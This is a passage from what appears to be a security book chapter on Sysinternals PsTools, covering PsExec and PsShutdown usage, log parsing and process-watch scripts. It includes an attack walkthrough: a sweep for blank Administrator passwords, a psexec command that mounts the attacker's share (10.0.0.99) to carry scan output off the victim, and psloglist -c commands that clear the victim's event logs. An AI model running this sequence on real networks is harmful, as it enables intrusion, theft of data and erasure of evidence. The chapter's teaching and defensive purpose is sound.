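   User Name:     Muaddib
1960,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 21:39:02 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
   User Name:     Muaddib
1959,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 18:02:41 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
   User Name:     Chani
1958,Security,Security,AUDIT SUCCESS,ARRAKIS,Fri Jul 25 17:55:10 2003, 520,SYSTEM\NT AUTHORITY,The system time was changed.
   Process ID: 1176
   Process Name: C:\WINDOWS\CNTX\VPCSRVC.EXE
1957,Security,Security,AUDIT SUCCESS,ARRAKIS,Fri Jul 25 17:40:00 2003, 517,SYSTEM\NT AUTHORITY,The audit log was cleared
   Primary User Name: SYSTEM
   Client User Name: Orc
"""

if __name__ == "__main__":
    events = parse_psloglist_s(SAMPLE_OUTPUT)
    print("failed logons:", dict(failed_logons_by_user(events)))
    print("repeated failures:", repeated_failures(events))
    print("log cleared:", [ev["record"] for ev in cleared_log_events(events)])
```

Run it over the file produced by psloglist -s security (or psloglist -s security -i 529 for just the failures) from each host; because the parser keys on the numeric record at the start of each line, it does not matter how many lines a message spans.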
PsExec ranks as the most useful of the PsTools suite. It executes commands on the remote system, even going as far as uploading a program if it does not exist on the target system. Unlike other remote tools such as the Windows clone of Unix’s rexec command, with PsExec you do not need to install support DLLs or special server applications. However, you must have access to the ADMIN$ share and proper credentials for this tool to work.
PsExec assumes you want to execute the command on a remote server, so the ComputerName argument is mandatory (you can always specify the –u and –p options for the username and password):
C:\>psexec.exe \\192.168.0.43 cmd /c dir
Be sure to keep track of your command paths. By default, PsExec works from the %SYSTEMROOT%\System32 directory. Here are some other examples:
C:\>psexec.exe \\192.168.0.43 ipconfig /all
C:\>psexec.exe \\192.168.0.43 net use * \\10.2.13.61\backups Rch!ve /u:backup
C:\>psexec.exe \\192.168.0.43 c:\cygwin\usr\sbin\sshd
If the program name or path contains spaces, wrap it with double quotes.
If the program doesn’t exist on the target system, use the –c option (or –f). This copies it from the system running PsExec to the \\ComputerName’s \System32 directory. The –f overwrites the file if it already exists. This example places fscan, a command-line port scanner, on the target, and then launches a port scan from that system against the class C network:
C:\>psexec.exe \\192.168.0.43 -c fscan.exe -q -bp1-10001 -o targets.txt 192.168.0.1-192.168.0.255
Conceivably, you could use -c to upload an entire tool kit to the target. If you suspect a file already exists and you want to overwrite it only with a newer version, you can supply the -v option in conjunction with -c. The -v option instructs PsExec to copy the file only if the version number is higher or the date stamp is newer. A file’s version number can be found by right-clicking the binary and selecting Properties.
The final options control how the remote process runs. To detach the process and let it run in the background, use –d (think daemon mode in Unix). Use –s to have the command run in a System account. The –i option enables interactive access, such as FTP or other commands that prompt for a password.
You can also control how the remote application executes by setting its priority (-low, -belownormal, -abovenormal, -high, -realtime) and processors on a multi-CPU machine with the –a option. Specify the processors by number after the –a option, such as –a 1,2 to run on processors 1 and 2 of a four-CPU system.
PsShutdown is the exception to the rule that each PsTool expands on its Windows counterpart: it performs the same functions as the Resource Kit shutdown tool. Both work remotely. You can shut down a server or stop a pending shutdown. The PsShutdown usage is shown here and in the table that follows (yes, it is safe to type psshutdown without options; it will display the usage):
C:\>psshutdown

PsShutdown v2.01 - local and remote system shutdown/lock
Copyright (C) 2000-2002 Mark Russinovich
Sysinternals - www.sysinternals.com

usage: psshutdown [-u Username [-p password] [[-s | -r | -k [-t nn] [-m "message"] [-f]]
                  -a | -l | -o] [\\computer]
PSShutdown Option | Description |
---|---|
-a | Aborts a shutdown (only possible while countdown is in progress). |
-f | Forces the running applications to close. |
-k | Powers off the computer (reboot if poweroff is not supported). |
-l | Locks the computer. |
-m | Displays message to logged on users. |
-o | Logs off the console user. |
-r | Reboots after shutdown. |
-s | Shuts down without poweroff. |
-t | Specifies countdown in seconds until shutdown (default is 20). |
-u | Specifies optional username for login to remote computer. |
-p | Specifies optional password for username. If you omit this, you will be prompted to enter a hidden password. |
\\computer | Shuts down the remote computer specified. |
There are no catches to using this tool. To shut down a system somewhat ungracefully, use the -f option; it works just like shutdown -c -y from the Resource Kit. Its benefit over the shutdown utility is that PsShutdown includes the -o option to log off the console user forcefully.
Strong firewall rules are increasingly locking down the ports a network makes available to the Internet. Good network architectures place high-risk servers such as web, e-mail, and DNS on network segments segregated from the internal corporate network and the Internet, an area often referred to as the demilitarized zone, or DMZ. However, the corporate network can be hostile to the web servers and databases in a DMZ in many ways. A “war-dialer” might find a user's desktop with PCAnywhere, a wireless drive-by might find a poorly secured access point that offers a Dynamic Host Configuration Protocol (DHCP) address, or a malicious user on the inside may wish to take a peek into the credit cards stored on the databases.
In any case, the NetBIOS ports between the corporate network and the DMZ are most likely open. After all, the concern is for hackers attacking from the Internet, right? Take a look at how the PsTools can pick apart a web farm. First, our attacker is on the corporate network (an IP address in the 10.0.0.x range), accessed from the parking lot with a wireless network interface card (NIC). The target network is the web servers and databases on the 192.168.17.x range. A port scan shows only a few open services:
C:\>fscan -p1-1024 192.168.17.1-192.168.17.255
192.168.17.1      139/tcp
192.168.17.1      135/tcp
192.168.17.1     3389/tcp
192.168.17.1      445/tcp
192.168.17.39      80/tcp
192.168.17.39     139/tcp
192.168.17.39     135/tcp
192.168.17.39     445/tcp
192.168.17.148     80/tcp
192.168.17.148    139/tcp
192.168.17.202    445/tcp
192.168.17.239    139/tcp
192.168.17.239    135/tcp
192.168.17.239    445/tcp
It looks like only the web and NetBIOS ports are open; the SQL ports must be blocked by the firewall.
The hacker could run Winfingerprint to find the true Administrator account name in case the system administrators renamed it (the account whose RID is 500). Here the attacker runs a quick test on the range to locate any systems with a blank Administrator password. It's pointless to try every IP address on the 192.168.17.x network, because many of them are unused. The hosts.txt file contains the IP address or hostname of only the live systems.
C:\>for /F %h in (hosts.txt) do psinfo -u Administrator -p "" \\192.168.17.%h > systeminfo_192.168.17.%h.txt
If any of the commands return successfully, the attacker has discovered an account with a blank password. Note that the attacker targeted the local Administrator account for each system. In this case, the host at 192.168.17.148 had a blank Administrator password. PsInfo also listed this hotfix:
SP2SRP1: Windows 2000 Security Rollup Package...
This rollup package means that the most common IIS vulnerabilities have been patched, but that doesn't impede the attack, as command-line access can be gained with PsExec.
The attacker creates a Windows share on her own system, 10.0.0.99, as a drop-off location for information gathered from the web server. Then the attacker uses PsExec to have the web server mount the share:
C:\>psexec -u Administrator -p "" \\192.168.17.148 net use * \\10.0.0.99\tools pass /u:user
Drive H: is now connected to \\10.0.0.99\tools.

The command completed successfully.
Next, the attacker runs another fscan from the compromised web server. The results should be different because the scan originates behind the firewall (check out Chapter 13 for methods on accessing ports blocked by firewalls):
C:\>psexec -u Administrator -p "" \\192.168.17.148 -c fscan.exe -q -o h:\fscan.output -bp1-65535 192.168.17.0-192.168.17.255
Notice what's happening here. Fscan is being copied to the victim system (-c); the victim system runs fscan and stores the output (-o h:\fscan.output) on the attacker's system. Remember that the previous step mapped the H: drive on the victim system to the attacker's system. Taking a look at the output, fscan has discovered one more service:
192.168.17.202 1433/tcp
The attacker found the database!
Next, the attacker runs PsExec against 192.168.17.202 and collects some basic information. Some of the commands to run include these:
ipconfig /all Determine whether the system is multi-homed. A web server often has two network cards—one for the Internet-facing IP address and another for back-end connections to a database.
netstat –na View current connections and listening services. This is an excellent way to identify other networks. For example, we could port scan an entire Class A network space (10.0.0.0/8) or examine the netstat output and discover connections to specific Class C networks (10.0.35.0/24, 10.0.16.0/24, and so on).
dir /s c:\ Recursive directory listing, repeated for each drive letter. Along with the PsService tool, this identifies what programs are installed. It might also highlight sensitive files such as global.asa, which contain clear-text passwords.
Once all of the data have been pilfered from the server, the attacker clears the logfiles and moves on to the next target:
C:\>psloglist.exe -c Application -u Administrator -p "" \\192.168.17.148
C:\>psloglist.exe -c System -u Administrator -p "" \\192.168.17.148
C:\>psloglist.exe -c Security -u Administrator -p "" \\192.168.17.148
The PsTools seem so basic that you might wonder about their usefulness. Ask yourself what you want to do. The ability to interact remotely with services, logfiles, processes, and the command line is not something to scoff at. In fact, a little bit of ingenuity combined with some short batch files and scheduled tasks can create a moderate IDS. Consider the following scenarios.
Monitor Processes
In 2001, a slew of IIS exploits launched cmd.exe shells back to the attacker. Sometimes, cmd.exe was renamed to root.exe.
To deal with this sort of attack, you first set up a hardened Windows system to serve as the master administration server. Then run the following batch file, a.k.a. Windows NT script, to watch for rogue processes (you will need the sleep and tee commands from the Resource Kit or Cygwin):
rem ProcWatch.bat
rem usage: procwatch.bat IPaddress username password
:loop
pslist \\%1 -u %2 -p %3 cmd | tee procwatch.txt
sleep 60
goto :loop
Notice that the batch file accepts the IP address, username, and password from the command line. This ensures that we never write down a password and makes the file universally applicable. Note, however, that the command history on the master server will remember the password; the history buffer can be set to zero from the cmd.exe Properties dialog box.
You can watch the PsList output in the command screen, or you can run other tools to search the procwatch.txt file automatically for the presence of cmd.exe.
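Searching procwatch.txt automatically is a short script. The following Python example was added for this section (it is not the author’s code and not part of PsTools); it parses the default pslist table that ProcWatch.bat writes, flags any process whose name is on a watchlist (cmd and root, the names the text mentions), and, if you keep the previous minute’s file, reports which processes are new since the last pass. The two snapshots embedded in it are constructed in the layout of the PsList output shown earlier; the cmd and inetinfo rows and their numbers are made up. It targets the default column layout, not the -t or -m layouts.

```python
import re
from typing import Dict, List, Set

# Names the text says the 2001 IIS exploits left behind (cmd.exe, sometimes renamed
# root.exe).  Extend with whatever should never be running on a given web server.
WATCHLIST: Set[str] = {"cmd", "root"}


def parse_pslist(output: str) -> List[Dict]:
    """Parse the default pslist table (Name Pid Pri Thd Hnd Mem User Time Kernel Time
    Elapsed Time) as written to procwatch.txt.  Anything before the header row,
    including the "Process information for HOST:" line, is skipped."""
    procs: List[Dict] = []
    in_table = False
    for line in output.splitlines():
        tokens = line.split()
        if tokens[:2] == ["Name", "Pid"]:
            in_table = True
            continue
        if not in_table or len(tokens) < 9:
            continue
        # The last eight columns are fixed; whatever precedes them is the process name,
        # which pslist prints without its .exe suffix.
        *name_parts, pid, pri, thd, hnd, mem, user_t, kernel_t, elapsed = tokens
        if not (pid.isdigit() and mem.isdigit()):
            continue
        procs.append({
            "name": " ".join(name_parts), "pid": int(pid), "priority": int(pri),
            "threads": int(thd), "handles": int(hnd), "mem_kb": int(mem),
            "user_time": user_t, "kernel_time": kernel_t, "elapsed": elapsed,
        })
    return procs


def _base_name(name: str) -> str:
    return re.sub(r"\.exe$", "", name.lower())


def rogue_processes(procs: List[Dict], watchlist: Set[str] = WATCHLIST) -> List[Dict]:
    """Processes whose name is on the watchlist (case-insensitive, .exe optional)."""
    return [p for p in procs if _base_name(p["name"]) in watchlist]


def new_processes(previous: List[Dict], current: List[Dict]) -> List[Dict]:
    """Processes present in the current snapshot but not the previous one.  Matching on
    (pid, name) rather than pid alone avoids missing a PID that was reused."""
    seen = {(p["pid"], _base_name(p["name"])) for p in previous}
    return [p for p in current if (p["pid"], _base_name(p["name"])) not in seen]


# Constructed snapshots one minute apart, in the layout of the PsList output above.
SNAPSHOT_1 = """Process information for GOBLYNSWOOD:

Name          Pid Pri Thd  Hnd   Mem     User Time   Kernel Time   Elapsed Time
Idle            0   0   1    0    16   0:00:00.000   3:57:29.219    0:00:00.000
System          8   8  39  319   216   0:00:00.000   0:00:11.536    0:00:00.000
SMSS          152  11   6   33   560   0:00:00.210   0:00:00.741    4:27:11.031
LSASS         240   9  14  307   520   0:00:00.260   0:00:00.230    4:26:48.028
inetinfo     1012   8  27  412  8124   0:00:02.112   0:00:03.004    4:20:01.228
"""

SNAPSHOT_2 = SNAPSHOT_1 + (
    "cmd          1532   8   1   20  1292   0:00:00.010   0:00:00.020    0:00:03.114\n"
)

if __name__ == "__main__":
    before, after = parse_pslist(SNAPSHOT_1), parse_pslist(SNAPSHOT_2)
    for p in rogue_processes(after):
        print(f"ALERT: watchlisted process {p['name']} pid {p['pid']} running for {p['elapsed']}")
    for p in new_processes(before, after):
        print(f"new since last pass: {p['name']} pid {p['pid']}")
```

Because tee overwrites procwatch.txt on every pass of the loop, copy the file to a dated name before the next pslist run if you want the new-process comparison as well as the watchlist match.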
Collect Log Files
Another advantage to using PsExec and PsLogList is logfile consolidation. We've already demonstrated how useful PsLogList is for gathering and clearing remote event logs. Web server logfiles require a more scripted approach. You could run scripts on each individual web server that copies logs, or you could run a single script from your master administration server that collects logfiles from all the web servers. In addition to the following two batch files, you need to set up the following:
C:\shares\dropoff\ A directory shared on the master server to which the Guest user has write privileges.
C:\logs\ A directory for storing logfiles. Create subdirectories here named for each web server.
The collection batch file. This is the file to run to start the collection process:
rem CollectLogs.bat
rem usage: CollectLogs.bat <username> <password>
rem "call" is required; without it control passes to rotate.bat and never returns,
rem so only the first web server would be processed.
for /F %%h in (webservers.txt) do call rotate.bat %%h %1 %2
This is the helper batch file that performs the actual work:
rem rotate.bat
rem usage: rotate.bat IPaddress username password
rem Stop the Web Service
psservice \\%1 -u %2 -p %3 stop w3svc
rem Mount the master's file share for dropping off files
psexec \\%1 -u %2 -p %3 net use L: \\master\dropoff plainpass /u:guest
rem Copy the files from the web server to the master (copy is a cmd built-in, so it
rem must run through cmd /c)
psexec \\%1 -u %2 -p %3 cmd /c copy C:\Winnt\System32\LogFiles\W3SVC1\*.log L:\
rem Move the files from the master's dropoff folder to the log folder
rem for the web server
move C:\shares\dropoff\*.log C:\logs\%1\
rem Disconnect the share
psexec \\%1 -u %2 -p %3 net use L: /del
rem Restart the Web Service
psservice \\%1 -u %2 -p %3 start w3svc
You could run this daily, weekly, or monthly. It leaves the logfiles on the web server but creates copies on your master server. Then you could come up with other scripts to perform automated log reviews.